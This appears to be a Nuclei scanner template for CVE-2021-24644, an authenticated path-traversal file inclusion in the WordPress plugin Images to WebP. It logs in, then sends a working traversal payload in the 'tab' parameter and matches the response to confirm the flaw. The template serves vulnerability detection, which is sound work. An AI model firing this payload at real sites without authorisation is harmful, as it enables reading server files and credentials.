id: CVE-2021-24644

info:
  name: Images to WebP < 1.9 - Authenticated Local File Inclusion
  author: Sourabh-Sahu
  severity: high
  description: |
    The Images to WebP WordPress plugin before version 1.9 did not validate or sanitize the tab parameter before using it in the include() function.
  impact: |
    Authenticated attackers can read arbitrary local files from the server via path traversal, potentially exposing sensitive configuration files, credentials, and system information.
  remediation: Fixed in 1.9
  reference:
    - https://wpscan.com/vulnerability/5a363eeb-9510-4535-97e2-9dfd3b10d511/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24644
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24644
    cwe-id: CWE-22
    epss-score: 0.05028
    epss-percentile: 0.91183
    cpe: cpe:2.3:a:imagestowebp_project:images_to_webp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: imagestowebp_project
    product: images_to_webp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/images-to-webp/"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/upload.php?page=images-to-webp.php&tab=..%2F..%2F..%2F..%2Fwp-links-opml HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "wp-links-opml", "Images to WebP")
          - regex('[A-Za-z]{3}, [0-9]{2} [A-Za-z]{3} 20[0-9]{2}', body)
        condition: and
# digest: 490a004630440220056a601f61ff3f7419ff5013b6470c51ece52211901a236c21ea50adc85f5db402207390c2ae4bab8097c95e37cc03e03696eb468dc403cea8b2e1454c8ab7134eaf:922c64590222798bb761d5b6d8e72950